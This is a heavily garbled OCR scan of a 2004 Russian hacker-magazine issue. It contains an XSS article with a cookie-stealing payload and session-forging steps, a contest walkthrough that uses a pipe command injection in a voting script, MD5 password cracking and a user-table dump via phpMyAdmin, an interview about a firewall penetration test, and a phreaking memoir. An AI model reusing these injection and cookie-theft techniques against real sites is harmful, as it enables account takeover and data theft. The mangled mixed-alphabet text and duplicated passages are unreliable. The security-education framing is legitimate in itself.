Межсайтовый скриптинг в ІВМ ’ЫеЮаГа' - 


1 ШІМ 




ѵ\ллл/ѵ.зесигііуІаЬ.ги/42434.ГіітІ 

Межсайтовый скриптинг в Хоорз в ’пеѵѵЫэ’ модуле - 

\ллллл/.5есигі1уІаЬ.ш/42442.ІтІтІ 


Результат работы тега [соІог=дгееп" 5{уІе=Ьаскдгоипб-ітаде:игІ(іаѵазсгірІ:аІеі1(сІоси- 
тепі.соокіе)) зІ2е="99]С5$ рулит[/соІог] Мелкий конфиг трояна 
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Подделка соокіе 



^ П ЧТО КПКЕР БУДЕТ ОЕППТЬ 

спохищенныМисом? 



Похищенный с форума кукис выглядит при- 
мерно так: 



Ь=Ь:%20ИоІІод=І:%20р(ірЬЬ2ту5дІ_(1аІа=а%ЗА2%ЗА%7В$%ЗА 

11%ЗА%22аиіоІодіпі(1%22%ЗВ$%ЗА0%ЗА%22%22%ЗВ$%ЗА6 

%ЗА%22и5егі(І%22%ЗВ$%ЗАЗ%ЗА%22471%22%ЗВ%7В:%20р 

РрЬЬ2ту5ЧІ_5ІсІ=а5са(1сЬ43Г68а1сІС(164Ь9324Г4е7162Г;%20рІірЬЬ 

2ту5ЧІ_1=а%ЗАЗ%ЗА%7ВІ%ЗА742%ЗВІ%ЗА1075844973%ЗВІ% 

ЗА744%ЗВІ%ЗА1075845106%ЗВІ%ЗА745%ЗВІ%ЗАІ075845231% 

ЗВ%70 



Как видишь, структура данных кукиса 
очень проста - можно видеть, что перемен, 
ным присваиваются определенные значе- 
ния. Что же сделает хакер с этим кукисом? 
Есть несколько способов воспользоваться 
им для получения акцеса. Самый простой 
из них, на мой взгляд - заюзать специаль- 



ную софтину, предназначенную для поддел- 
ки кукисов. Называется она Соокіе Егіііог. 
Скачать ее можно отсюда: 
и«.п5(І.™/5о(і.рІір?дгоур=Ііаск5оМга2(ІеІ=оіІіег. Хак- 
сор логинится под своим ником в форуме. 
На хард ему записывается кука с его сесси- 
ей. Потом он закрывает браузер и запуска- 
ет Соокіе Ебііог. Выбирает саму куку, кото- 
рую оставил форум, и меняет значения со- 
ответствующих переменных на значения из 
сворованной куки. Потом хакер открывает 
браузер, заходит в форум и... о, чудо! Он 
залогинился под ником другого юзера! 

А мочу защититься 

Защититься от атаки С55 обычному пользо- 
вателю непросто. Конечно, можно отключить 
іаѵазегірі, но это не выход - без него не 
обойтись на многих сайтах. Поэтому о защи- 
те от межсайтового скриптинга должны ду- 
мать разработчики скриптов - им необходи- 



мо фильтровать все данные, поступающие 
от пользователя. 

Тебе же могу посоветовать быть бди- 
тельным. Если вдруг увидишь, что выскаки- 
вают всякие окна, браузер ведет себя как- 
то не так, то задумайся! А вдруг это какой- 
то взломщик пытается тебя поиметь? Прос- 
мотри МтІ-код. Проверь содержимое стра- 
ницы на наличие левых іаѵазсгірі-вставок. И 
если увидишь что-то подозрительное, напи- 
ши о найденном баге администратору сай- 
та, а сам лучше покинь это сервер... От 
греха подальше :). Такие вот пожелания. 
Грустно, конечно, но иначе не продержать- 
ся в этом сумасшедшем мире сетевой бе- 
зопасности. Удачи! 

ІІІІ II II 
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В от и прошел месяц с момента запуска первого 
конкурса. Скажу сразу - ценный приз остается 
у нас. Но на этот раз не из-за того, что мы жад- 
ные, а просто потому что до самого конца не дошел 
никто. Хотя к победе был близок не один человек. 
Многим удавалось получить шелл-доступ, некото- 
рые из них находили на сайте (и, скорее всего, рас- 
шифровывали) пароль от базы данных, а кто-то да- 
же установил ркірМуАбтіп. Но аккаунты с паролями 
пользователей из базы не прислал никто. Теперь 
перейдем к делу. Надеюсь, ты набрался опыта и му- 
жества для того, чтобы успеть первым пройти сле- 
дующий конкурс. На этот раз мы решили немного 
упростить задание. Что же, собственно говоря, тебе 
теперь нужно сделать? На том же сайте «ш.райопак.ш 
мы снова разместили страницу, которую опять нуж- 
но поломать :). Для победы в конкурсе тебе предс- 
тоит пройти следующие этапы: 

О. С помощью дыры в скриптах получаешь шелл- 
доступ на иш.рзйопак.гі]. 

О. Находишь среди файлов ссылку на некий адми- 
нский интерфейс. 

О. Когдаты в него зайдешь, появится окошко Ьазіс- 
авторизации, в которое нужно будет ввести логин с 
паролем, который надо будет поломать (пасс там 
простой, он имеется почти во всех словарях). 

О. Если тебе удастся подобрать пасс, можешь себя 
поздравить - ты прошел конкурс. 

Тебе останется ввести в появившейся форме свои 
координаты и нажать на кнопку «послать». 

Сразу после того как ты нажмешь на эту заветную 
кнопку, на наш секретный адрес придет письмо, ко- 
торое и будет являться доказательством того, что 
ты смог справиться с трудностями ] [-конкурса. 
А если ты еще окажешься первым, то не только вой- 
дешь в историю ][, но и получишь классный приз. 

Не медли, хаксорь быстрее! :) Надеюсь, в этот раз 
успеешь до конца марта. 

А КПКПРОЙТИ ФЕВРППЬСКИЙ КОНКУРС 

Шелл-акцес на сайте нужно было получить с по- 
мощью дырявого скрипта. На сайте скрипт был 
только один - голосование. Поэтому искать баг 
нужно было в нем. Если посмотреть страницу в ви- 
де НктІ, можно было найти строку 



<іприккуре="кііс!сІеп" пате-'кііе" ѵаіие="ѵоке.кхк">. 

Имя файла, в котором сохраняются результаты голо- 
сования, передается через Нісісіеп-поле с именем кііе 
в самом теле страницы. Файл открывался для изме- 
нения инфы с помощью команды ОРЕІЧ. У этой коман- 
ды есть одна особенность. Если первый символ отк- 
рываемого файла будет являться символом конвейе- 
ра « | », тогда все, что идет после него, будет интерпре- 
тироваться как команда операционной системы. 
И эта команда исполнится с привилегиями веб-сер- 
вера. Если сохранить главную страницу падонкаф к 
себе на винт, изменить в этой строке слово «ѵоке.кхк» 
на « | Із -Іа>../оик.кхк» и нажать кнопку «Ответить», ис- 
полнится команда «Із -Іа», что приведет к созданию 
файла оик.кхк в корне сайта ѵѵии.райопак.ги, который будет 
содержать список файлов директории сді-Ьіп. 

Итак, шелл на сайте у тебя теперь есть. Исследуя 
содержимое папок на сайте, рано или поздно натк- 
нешься на каталог бака, в котором лежат 2 файла: 
бЬкюзк.кхк и сІЬразз.кхк. В последнем как раз и нахо- 
дится логин с зашифрованным паролем. На глаз 
можно определить, что пароль зашифрован алго- 
ритмом ІѴЮ5. Сливаем софтину тббіпзібе, натрав- 
ливаем ее на хеш и через 20 минут получаем рас- 
шифрованный пароль к Му501_ базе банных. 

Далее с помощью утилиты кекскі (ѵѵдек’а там нет) 
сливаем с т.рііртуаіітіп.пеі на м.райопак.ги скрипт 
рИрМуАбтіп для управления базами данных. Рас- 
паковываем его с помощью утилиты каг в какой-ни- 
будь каталог. Теперь скрипт необходимо настроить. 
В файле сопкід.іпс.ркір нужно прописать логин и па- 
роль для соединения с базой данных. Для этого ты 
сливаешь ркірМуАбтіп к себе на тачку, находишь 
этот файл и вставляешь логин и пароль в соответ- 
ствующее место конфига. 

Потом заливаешь этот конфигурационный файл на 
падонак.ру, заменив старый файл конфигурации но- 
вым. После этого создаешь сайт на народе, залива- 
ешь туда настроенный сопкід.іпс.ркір и тут же закачи- 
ваешь его на мш.райопак.п) с помощью того же кекскі’а. 

Остается только зайти браузером в ркірМуАбтіп 
и с помощью удобного админского интерфейса вы- 
вести на экран таблицу с логинами и пассами юзе- 
ров, которые и требовалось предоставить в качест- 
ве доказательства взлома. 









И бычно хак-группы допго не живут. Распадаются через год-два - причин тому может быть много. То пи кто-то чего-то не поделил, то 
пи появились другие заботы. 

ІІкН (еат - одна из немногих "старых" команд, которая существует по сей день. Причем не просто существует, а заметно выросла. 
Из "іІе(асе"-тим превратилась в уважаемую весигііу-команду, услугами которой пользуются многие компании. 

О том, как появилась ІІкН, как она работает, и немножечко о себе рассказывает ее фаундер - ХЫР. 

хвірііжщ: «информационная безопосность - это ороцесс, а не резштот» 



Л О ГРУППЕ: 

тЫѵѵОгк: 

а вашем сайте Мір://іі$і.ісчіп(о.пі 

есть небольшой аЬоиі об 1Л<Я, 
но как-то там все слишком 
официально. В двух словах, кто 
вы и откуда? 

ХЫР: В марте 2000 года 
у нас с друзьями прошел ряд 
дискуссий, в результате кото- 
рых стало ясно - пора объединяться под но- 
вым проектом. Название ІІкВ іеат пресле- 
довало сразу несколько целей: это и указа- 
ние на государственную принадлежность, 
которое должно было, по идее, вводить не- 
доброжелателей в заблуждение, и память 
об исторических корнях, и некоторые личные 
причины, о которых я лучше умолчу. 

Первое время мы попросту взламывали 
компьютерные системы и иногда там чего-то 
изменяли. Не корысти ради, исключительно 
в образовательных целях :). Например, если 
обнаруживалась система ІВІХ, то, зная, что 
вряд ли еще представится шанс поработать 
на тірз'овских процессорах, мы смотрели, 
как все работает и взаимодействует, изучали 
ключевые особенности... Дефейс был как 
резюме после изучения очередной главы 
учебника. Сделал дефейс - поставил точку. 





тіпсІѵѵОгк: Сколько чело- 
век числится в официальных 
мемберах сейчас? Над каки- 
ми проектами вы работаете? 

Какие ваши работы получили 
наибольшее признание у 
зесигііу-сообщества? 

ХЫР: Мемберов у нас 
сейчас четверо: 

ХЫР - ваш покорный 
слуга :). 

Оеѵоісі - программист, 
специалист по реверс-инжи- 
нирингу. В настоящее время, 
помимо учебы и проектов 
СІкРі Іеат, входит в группу 
разработки антивирусного 
ПО для одного российского 
Ііпих-проекта. Соавтор книги 
"Безопасность Ассемблера". 

зргОІ - системный инженер, МС5Е, 

ССИА. 

ІОск - программист, принимает участие в 
тестировании зесигііу бідііаі сбір компании 
Затзипд. 

Основное направление ІЖВ - собственные 
исследования в области информационной 
безопасности. Многие наши утилиты исполь- 
зуют как представители хакерского сообще- 



ства, так и специалисты по защите информа- 
ции. 

Например, программа иЗТ.АпШЧтар, сво- 
дящая на нет механизм определения ОС ска- 
нером Итар, и Иопеуроі-система СІЗТ. ЫаГе 
были упомянуты в книге А.Лукацкого «Обна- 
ружение атак» (2-е издание). А исследования 
в области Апіі-Ріпдегргіпі получили положи- 
тельный отклик у известного зесигііу-экспер- 








разговоры с икнопной весовітѵ группой 




фрикинг наших 

ДНЕЙ 

Что представляет собой 
фрикинг на 

сегодняшний день у нас 
в России. 



ДЕВЧПЧИИ ОПРОС 

Что девушки думают 
о хакерах? Мы опро- 
сили 1 5 девушек - и 
получили интерес- 
ный результат. 



N080- 

ПЭРОКОСМИЧЕСКИЙ 
ЦЕНТР МИРО 

Рассказ об одной из самых 
популярных научных 
организаций в мире. 



та Ілпсе Вріііпег (автор книг Кпоѵѵ Уоиг 
Епету и Нопеуроіз: Тгаскіпд Наскегз, осно- 
ватель проекта (іопеупеі). «Тітезе аге ѵегу 
ехсіііпд апсі изеГиІ Іюпеуроі іооіз! № оі рео- 
ріе ѵѵоиИ Ііпб ІЫ$ ѵегу іпіегезііпд», - это его 
слова :). 

Совместно с ЗІІІоп'ом (проект ЗаГетосІе, 
иии.заГетоРе.огд) мы разработали Зргіпі ОЗ Ііп- 
дегргіпі 0.4. 1 . 

тіпсІѵѵОгк: Я слышал, когда-то проводи- 
лись глобальные хак-тусы, в которых прини- 
мали участие практически все наши извест- 
ные команды, включая ІІкВ. Расскажи о них. 
Проводится ли что-либо подобное сейчас? 

ХЫР: Действительно, отдельные предс- 
тавители команд ІЖВ, ОМ, беѵ/ісе 
(включая бывший РОІ), ѴОЮ, І_едіоп2000 ре- 
гулярно встречались. Обсуждали то, что бы- 
ло у всех на уме - безопасность. Информа- 
ционный голод, который мучил нас всех 4 
года назад, вкупе с юношеским энтузиазмом 
давали поразительные результаты. Самая 
крупная туса, насколько я помню, собрала 
около 20 человек. 

Сейчас встречи проводятся гораздо реже. 
Многие поняли, что информационная безо- 
пасность - не для них. Стали заниматься 
другими вещами. Но в память о старых вре- 
менах собираемся по-прежнему на том же 
месте, договариваясь перед встречей, что 
"водку на лавочках пить не будем" :). 

тіпсІѵѵОгк: Расскажи о зесигііу-бизнесе в 
нашей стране. Насколько у нас востребовано 
это направление и как велика конкуренция? 

ХЫР: О том, насколько востребовано, 
можно судить по отчетам о причиненном 
бизнесу ущербе в результате вирусных эпи- 
демий, попыток несанкционированного дос- 
тупа и прочего. Компании не хотят терять 
деньги, но пока не могут найти баланс меж- 
ду вложенными в безопасность средствами 
и отдачей от них. Конкуренция практически 
отсутствует - все работают по своим направ- 
лениям. 

тіпсІѵѵОгк: Насколько уверенно себя 
чувствует ИкВ в зесигііу-бизнесе? На какого 
клиента вы ориентируетесь и как находите 
своих клиентов? 

ХЫР: Мы занимаем свою нишу. Как в той 
пословице: каждый сверчок знай свой шес- 
ток. Клиенты в большинстве случаев находят 



нас сами. Обычно это те, кто заинтересован 
в наших проектах. 

тіпсІѵѵОгк: Ты наверняка знаешь свой 
рынок. Расскажи вкратце о других российс- 
ких компаниях, занимающихся обеспечением 
компьютерной безопасности. Не официаль- 
ную инфу из их абоиі'ов, а твое объективное 
мнение. 

ХЫР: Информзащита - лучший учебный 
центр и лучшие комплексные решения по 
безопасности, но их минус - для тестирова- 
ния на проникновение негласно приглашают- 
ся люди со стороны. Наиболее компетентны 
в вопросах тестирования на проникновение 
Андек и БлэкСан. Шумная Розіііѵе 
Тесбпіодіез ни на что больше не способна, 
кроме как выдавать отчеты по работе своего 
сканера без какого-либо глубокого анализа. 
Внимания заслуживает Рідііаі Зесигііу (быв- 
шая Ротіпа Зесигііу) - практически монопо- 
листы по продвижению стандартов безопас- 
ности на российский рынок и авторы не 
имеющих аналогов в России учебных курсов. 

Все остальные компании не имеют ни 
специалистов, ни опыта работы по обеспе- 
чению действительно актуального уровня бе- 
зопасности. Те же Ланит, ІВ5, Кварта и др. 

тіпсІѵѵОгк: Интересно было бы узнать, 
как на практике происходит работа по обес- 
печению безопасности в компании. Расска- 
жи на примере любого из ваших клиентов, 
как вы с ним работали. Начиная с перегово- 
ров и обсуждения деталей и заканчивая 
собственно оплатой. 

ХЫР: Для одного из наших клиентов наи- 
большую опасность представлял промыш- 
ленный шпионаж. Т.е. основным требовани- 
ем к нам было обеспечение конфиденциаль- 
ности и целостности информации, являю- 
щейся коммерческой тайной компании. Мы 
решили сразу провести тестирование на 
проникновение в корпоративную сеть клиен- 
та и попытаться получить доступ к храня- 
щейся там информации. В качестве исход- 
ных данных был дан лишь веб-сервер компа- 
нии, и, естественно, мы знали ее название. 
Оказалось, что веб-сервер находится на аут- 
сорсинге у провайдера. Нужно было выяс- 
нить диапазон адресов, принадлежащих кли- 
енту. Посмотрев РМ5 записи, а позже полу- 
чив ответ на наше письмо, написанное яко- 
бы новым сотрудником, мы узнали ІР-адрес 



официальный пвоіп с сайта іікв 

Ц кВ зесигііу Іеат основана в марте 2000 года небольшой 
группой программистов, преимущественно занимающихся 
вопросами информационной безопасности. В настоящее время 
ІІ5Т твердо занимает свое место на рынке поставщиков решений 
по обеспечению безопасности объектов и защиты информации. 

Наличие собственных конкурентоспособных разработок, проект- 
но-аналитического отдела и отдела научных исследований поз- 
воляют нам производить полный цикл работ по внедрению сис- 
тем обеспечения безопасности. 




І1ІІГ ЬгситЛу I МГЦ 



Логотип ЦкР Зесигііу Теат 

почтового сервера. Следующим шагом была 
попытка просканировать диапазон адресов 
на предмет определения версий ОС и ис- 
пользуемых сервисов. Но тут сразу стало яс- 
но, что внешний периметр контролирует 
межсетевой экран. Уязвимостей в доступных 
нам сервисах и службах выявлено не было, и 
мы уже собрались писать в отчете, что про- 
никновение не удалось, если бы не один мо- 
мент. Во время тестирования мы пользова- 
лись поисковыми системами для поиска поч- 
товых адресов сотрудников компании, и нео- 
жиданно на сайте іоЬ.гіі обнаружили вакансию 
от нашего клиента. Требовался человек на 
замещение должности сетевого администра- 
тора, и в анкете было указано, что обяза- 
тельным условием является опыт работы с 
Сііескроіпі Войѵгаге РігеѵѵаІІ. 

Стало ясно, что за зверь встал у нас на 
пути :). Мы вплотную занялись изучением 
возможностей этого продукта и со време- 
нем нашли лазейку, через которую взяли 
управление на себя. Оставалось только зас- 
тавить файрвол принимать анонимный дос- 
туп из интернета за доступ из сети вида 
ѴРІ4, после чего мы оказались во внутрен- 
ней сети. Скопированный «План развития 
компании на полугодие» стал доказатель- 
ством нашей работы. 

тіпсІѵѵОгк: Прямо триллер какой-то :). А 
сколько, если не секрет, сейчас стоят услуги 
по обеспечению компьютерной безопаснос- 
ти? Понятно, что от многого зависит, но все- 
таки :). 

ХЫР: Если это тестирование на проник- 
новение, то в зависимости от результатов 
сканирования: $300 - $10000. Все зависит от 
имени и статуса компании. Если РТ готовы 
за $500 сканить (а ничего больше и не мо- 
гут), то ІВ5 уже берет $10000. Тарифы на 
консультации слишком уж рознятся, а диапа- 
зон цен на внедрение политики безопаснос- 
ти компании: $5000 - $20000. 

тіпсІѵѵОгк: Тебе хотелось бы, чтобы ІІкВ 
стала одной из крупнейших и авторитетных в 
мире компаний по обеспечению безопасное- 





В ПРОДАЖЕ С 17 МАРТА 




В номере: 

КТО ТАКОЙ ТОМ КЛЭНСИ? 



Американский писатель, чьи романы стали 
эталоном политических боевиков о Холод- 
ной войне (и конфликтам, последовавшим 
за ней), серьезно повлиял и на индустрию 
компьютерных и видеоигр. Проекты, назва- 
ние которых начинаются с волшебного "Тот 
СІапсу'з", заслуживают самого пристального 
внимания геймеров, в первую очередь - 
поклонников шпионских триллеров. По моти- 
вам наиболее популярных книг сняты извест- 
ные кинофильмы. В чем же секрет успеха? 
И какие еще сюрпризы готовятся для нас? 



ОТЧЕТ С КРИ 2004 

На Конференции разработчиков игр 2004 
будут представлены все заметные россий- 
ские (а также украинские) проекты, а также 
проведены многочисленные встречи, о ко- 
торых в следующем номере мы вам и рас- 
скажем. Самое громкое событие в россий- 
ской индустрии не останется без внимания 
- павильон нашего издательства обещает 
быть не менее интересным, чем у иной 
крупной игровой компании. 



5ІІ_ЕІ\ІТНіи_4 
И РЕ5ЮЕІМТ ЕѴІІ_ 4 

Две мощные серии ужастиков вскоре 
сойдутся в смертельной схватке. Свежая 
информация поступает и от Копаті, и от 
Сарсот. Потусторонние силы и 
одурманенные неизвестно чем жители 
южноамериканской деревни - что 
покажется вам более страшным? В обеих 
играх вас ждет полностью трехмерная 
графика, оптимизированная для РІауЗІаІіоп 
2 и СатеСиЬе соответственно. Борьба за 
кошельки геймеров начинается уже сейчас. 



СТРАНА 





ти? Или тихо-спокойно работать в любимом 
деле без дополнительной мороки для тебя 
предпочтительнее? 

ХЫР: Размер компании и авторитет - 
разные вещи. Безусловно, хотелось бы зас- 
лужить хороший авторитет. Ну а размеры - 
это уже от нас зависит. 

тіпсІѵѵОгк: В интервью с тОО в фев- 
ральском Хакере один из мемберов группы 
упомянул о вас так: "ІІкВ увлеклась секьюри- 
ти как бизнесом, и, имея в составе своей ко- 
манды около 2 человек, уже не представля- 
ется мне частью сцены 1 '. Было бы интересно 
услышать твой комментарий :). 

ХЫР: Сразу видно, что автор не имеет ни 
малейшего представления о делах и положе- 
нии нашей команды. Ведь только просмот- 
рев новостную ленту на сайте, можно убе- 
диться, что проект поддерживают более двух 
человек. Занимаемся мы не секьюрити как 
бизнесом, а бизнесом как частью безопас- 
ности. А вообще, если ему что-то представ- 
ляется, это его личные проблемы =). 

^ о СЕБЕ: 

тіпсІѵѵОгк: Расскажи теперь о себе лю- 
бимом. Как зовут, сколько лет, где учишь- 
ся/работаешь, чего ждешь от жизни? 

ХЫР: Павел Валерьевич =)), 21 год. Ос- 
новное место работы - аналитик информаци- 
онной безопасности в одной из крупнейших 
компаний России. Никаких фраз типа «стать 
самым-самым специалистом по безопаснос- 
ти» ты не услышишь =)). Все проще и ба- 
нальнее: жить с любимой девушкой и нас- 
лаждаться счастьем. 

тіпсІѵѵОгк: Дай угадаю. Первый комп ты 
увидел в конце 80-х в какой-нибудь станции 
юных техников. Быстро преодолел стадию 
геймерства, начал потихоньку программиро- 
вать на басике. Потом, сдавая тоннами бу- 
тылки, накопил денег на собственный Спект- 
рум и безвылазно работал за ним. Уже где- 
то в 1995 купил нормальный РС. Практичес- 
ки сразу подключился к инету и принялся 
разбираться, куда совать ТСР/ІР и как рабо- 
тают баги... Все было примерно так, или я 
где-то ошибся? :) 

ХЫР: Дата правильная =). Первый комп 
увидел в конце 80-х у родителей на работе - 
это был новейший 80086 =)). Через какое-то 
время родители подарили свой компьютер, 
с этого и начались первые опыты програм- 
мирования. Только на басике я никогда ни- 
чего не писал. В 12 лет продал другу за 5 



тыс. рублей первую программу. Это был 
простенький вирь, вносящий изменения в 
конфигурационные файлы и имеющий ин- 
терфейс популярного тогда антивируса 
Айіезі. 

тіпсІѵѵОгк: Сильно болел компами в то 
время? 

ХЫР: Сильно - не то слово. Кроме них 
вообще ничего не замечал. 

тіпсІѵѵОгк: Легко ли тебе давалась 
«компьютерная грамота»? 

ХЫР: Если бы давалась легко - было бы 
не так интересно. Чем дальше в лес - тем 
больше дров, как говорится. 

тіпсІѵѵОгк: Ник у тебя оригинальный весь 
такой. Прям как у меня :). У него есть столь 
же оригинальная предыстория? Ты еще, нас- 
колько я знаю, подписываешься разными 
птичьими никами. Любишь птичек, да? :) 
ХЫР: Когда-то я подписывался Хирург, 
но знакомая девушка называла сокращенно 
хир. И потом как-то незаметно у нее это 
трансформировалось в хыр. Это прозвище 
закрепилось за мной и среди сетевых дру- 
зей. Сбаіка - раньше это был ник девушки, 
отношения с которой показали мне, чего я 
стою как мужчина, определили взгляды на 
мир. Именно она помогла мне превратить 
хобби в специальность. Тот, кто читал роман 
Р.Баха «Чайка по имени Джонатан Ливин- 
гстон», поймет мой жизненный путь. А ВО- 
РОНА (третий ник - прим. тіпсІѵѵОгк) - под- 
ходящий образ. Умная, расчетливая птица. 
При ощущении опасности становится очень 
осторожной. Поедает всевозможных мелких 
животных, падаль, отбросы и растения. 

тіпсІѵѵОгк: Некоторые люди, с которыми 
я разговаривал, считают, что российская 
хак-сцена - одна из самых сильных и спло- 
ченных. Я - парень не местный, ничего про 
это не знаю. Но очень мне интересно, какая 
она на самом деле - эта наша хак-сцена? 

ХЫР: Не хочу вдаваться в подробности, 
так как рассказа о ней без оценки не полу- 
чится, а оценку я давать не вправе. Скажу 
лишь, что раньше сцена была, сейчас - в 
коме. Ждем выздоровления. 

тіпсІѵѵОгк: Как по-твоему, может ли хо- 
роший специалист у нас получать соответ- 
ствующие своей квалификации деньги, или 
все-таки лучше драпать отсюда в более раз- 
витые страны? Что ты вообще думаешь о пе- 
реезде в США или Германию? 

ХЫР: Может. Сужу по себе. Мне хватает, 
чтобы полностью удовлетворить все свои 







разговоры С ЦКНОПНОЙ ЗЕШІТѴ группой 



ХЫР: Если бы давалась легко - было бы 
не так интересно. Чем дальше в лес - тем 
больше дров, как говорится. 

тіпсІѵѵОгк: Ник у тебя оригинальный весь 
такой. Прям как у меня :). У него есть столь 
же оригинальная предыстория? Ты еще, нас- 
колько я знаю, подписываешься разными 
птичьими никами. Любишь птичек, да? :) 
ХЫР: Когда-то я подписывался Хирург, но 
знакомая девушка называла сокращенно хир. 
И потом как-то незаметно у нее это транс- 
формировалось в хыр. Это прозвище закре- 
пилось за мной и среди сетевых друзей. 
СНаіка - раньше это был ник девушки, отно- 
шения с которой показали мне, чего я стою 
как мужчина, определили взгляды на мир. 
Именно она помогла мне превратить хобби в 
специальность. Тот, кто читал роман Р.Баха 
«Чайка по имени Джонатан Ливингстон», 
поймет мой жизненный путь. А ВОРОНА (тре- 
тий ник - прим. тіпсІѵѵОгк) - подходящий об- 
раз. Умная, расчетливая птица. При ощуще- 
нии опасности становится очень осторожной. 
Поедает всевозможных мелких животных, па- 
даль, отбросы и растения. 

тіпсІѵѵОгк: Некоторые люди, с которыми 
я разговаривал, считают, что российская хак- 
сцена - одна из самых сильных и сплочен- 
ных. Я - парень не местный, ничего про это 
не знаю. Но очень мне интересно, какая она 
на самом деле - эта наша хак-сцена? 

ХЫР: Не хочу вдаваться в подробности, 
так как рассказа о ней без оценки не полу- 
чится, а оценку я давать не вправе. Скажу 
лишь, что раньше сцена была, сейчас - в ко- 
ме. Ждем выздоровления. 

тіпсІѵѵОгк: Как по-твоему, может ли хо- 
роший специалист у нас получать соответ- 
ствующие своей квалификации деньги, или 
все-таки лучше драпать отсюда в более раз- 



витые страны? Что ты вообще думаешь о пе- 
реезде в США или Германию? 

ХЫР: Может. Сужу по себе. Мне хватает, 
чтобы полностью удовлетворить все свои 
потребности, плюс 2 раза в месяц на выход- 
ные выезжать за пределы России. О переез- 
де ничего не думаю. Я патриот! =) 
тіпсІѵѵОгк: А куда, если не секрет, выез- 
жаешь? Вообще, какие у тебя любимые мес- 
та для отдыха и для посмотреть? Как вообще 
предпочитаешь отдыхать? 

ХЫР: В Москве - это центр и набереж- 
ные. Люблю пройтись по центру столицы, 
понаблюдать за людьми, их поведением и 
жизнью. А набережные - то место, где ты 
один в самом центре жизни. Прекрасные 
субъективные ощущения. Предпочитаю пе- 
шие прогулки в размышлениях. А также пе- 
риодически выбираться к друзьям в Киев, 
Минск, другие города. 

тіпсІѵѵОгк: Насколько я знаю, ты сейчас 
работаешь над какой-то книгой. Которой, 
вроде, даже аналогов нет :). Расскажи о ней 
поподробнее. 

ХЫР: Книга посвящена такому аспекту 
информационной безопасности, как 
Ріпдегргіпі - удаленное определение типов и 
версий операционных систем, сервисов и 
служб. Так как Ріпдегргіпі сейчас неотъемле- 
мая часть несанкционированного доступа, 
книга может стать интересной как специа- 
листам по обеспечению ИБ, так и тем, кто 
непосредственно осуществляет попытки 
НСД. Книгу пишу я один, в основном ориен- 
тируясь на результаты собственных исследо- 
ваний и исследований ЕІкРі іеат. 

тіпсІѵѵОгк: Признание твоих способнос- 
тей каким человеком ты бы посчитал самым 
для себя значимым? С кем из зесигііу ррі ты 
бы хотел познакомиться в ВБ? 



ХЫР: Своей любимой девушкой. Со все- 
ми, с кем имею хорошие отношения в интер- 
нете. 

тіпсІѵѵОгк: До меня дошли слухи, что ты 
скоро женишься. Как это тебя угораздило, 
дружище? :) Не боишься, что жена будет 
всячески отвлекать от компа, постоянно от- 
рывать от работы с назойливыми требовани- 
ями какого-то там долга? :) 

ХЫР: Да, на страницах вашего журнала 
хотел бы еще раз сказать, что я люблю На- 
дюшку Остафийчук =)). Летом можете позд- 
равлять со свадьбой. 

И ничего такого я не боюсь. Она - одна 
из умнейших людей, которые мне встреча- 
лись в жизни. А учитывая то, что она превос- 
ходный юрист и экономист, ее знания как 
нельзя кстати пригодятся на данном этапе 
развития ІІкВ зесигііу іеат. 

тіпсІѵѵОгк: Расскажи о своих предпочте- 
ниях. Что читаешь, что слушаешь, что смот- 
ришь, что носишь, что ешь/пьешь и т.п. 

ХЫР: Читаю все подряд, от женских жур- 
налов сестры до бухгалтерских справочников 
матери. Слушаю спокойную музыку, шансон 
(не уголовный и не блатной), инструменталь- 
ное что-нибудь. Смотрю тоже все подряд, но 
особенно люблю документальные и истори- 
ческие фильмы. Являюсь абсолютным про- 
тивником алкогольных напитков. Предпочи- 
таю посидеть в тихой кафешке с чашкой ка- 
пучино или кока-колы. 

тіпсІѵѵОгк: Какой совет может дать такой 
успешный специалист в сфере зесигііу тем 
ребятам, которые еще не достигли успеха, 
но нему стремятся? 

ХЫР: Информационная безопасность - 
это процесс, а не результат. Поэтому лучше 
участвовать в процессе, чем, спотыкаясь, бе- 
жать за результатом. ЗП 





СЦЕНП 



/ И0КЕР/№03(63)/2004 



И днажды тихим зимним вечером в наш радиокружок Дворца пионеров зашел бывший выпускник этого же кружка, назовем его Пнд- 
рей. Он уже успел окончить университет и работал инженером в каком-то суперсекретном НИИ. После занятий Пндрей предложил 
меня подвезти, и у него в машине я заметил телефонную трубку с кнопками. Кнопочный телефон тогда был редкостью, а его наличие 
в машине вообще было чем-то невероятным. Через какое-то время водитель набрал на трубке номер и произнес: «Плпе, киса, через полча- 
са буду дома». От восторга и удивления я потерял дар речи и только спустя минуту поинтересовался, что это за штука такая. «Да так, ради- 
отелефон. «Пптай» называется», - ответил Пндрей. 



РПССКПЗ ИНСОЙДЕРО ОБ ИСТОРИИ И РЕППИЯХ РОССИЙСКОГО ФРИКИНГО 




Ч ерез пару месяцев он снова 
пришел к нам в радиокружок 
с платой, в которую было за- 
паяно несколько десятков ло- 
гических микросхем, а сверху 
находился маленький свето- 
диодный индикатор. На наш 
вопрос, что это такое, Анд- 
рей ответил: «Пацаны, это же АОН!» Что та- 
кое АОН, мы не знали, но дружно сделали 
вид, что в курсе дела. Подключив этот де- 




л ѵѵѵм.ііаскегзгиззіа.ги - лучший российский 
сайт по фрикингу 

л ѵѵѵт.аЬоиірМопе.іпІо/ів/рЬгеак.ІіІтІ - еще 
один полезный сайт по телефонии 
л (Іозка.роІідоп.іпЕо - форум, где можно 
купить детали 

а ѵѵѵм.сІідіІаІ-ІаЬогаІогу.сІе - архив 
фрикерских утилит 

А ѵѵѵѵѵу.рІіопеІ05ег5.огд - сайт известнейшей 
фрикерской группы 
а ѵѵѵллМехШез.сот/рІігеак - огромное 
количество инфы по фрикингу 
А ѵѵѵуѵѵ.тетЬегзЛгіросІ.сот/-5еи85Іу0пе/РА0.МтІ - 
тематический РАО 

а ѵѵѵѵѵѵ.Ііаскегзгиззіа.ги/СагсІз/ипкз/Ііпкз.рІір - 
дополнительные ссылки 



вайе к телефонной линии, мы попросили 
знакомых, чтобы они нам прозвонили с 
разных телефонных номеров. Плата долгое 
время не подавала признаков жизни, но 
после некоторых махинаций на индикаторе 
появились непонятные символы. А спустя 
еще немного времени он уже отображал 
телефонные номера звонящих. 

В машине я расспросил Андрея о теле- 
фоне. Оказалось, такой аппарат для прос- 
тых смертных был недоступен и использо- 
вался только большими начальниками. Ему 
этот девайс достался от знакомых, которые 
его у кого-то сперли и попросту не знали, 
что с ним делать. Ну и, чтоб добро не про- 
падало, подарили молодому инженеру для 
опытов. Андрей восстановил не только 
оборванные провода, но и сделал новую 
антенну, а самое главное, научился пере- 
пайкой перемычек менять телефонный но- 
мер, под которым девайс совершал звонки. 

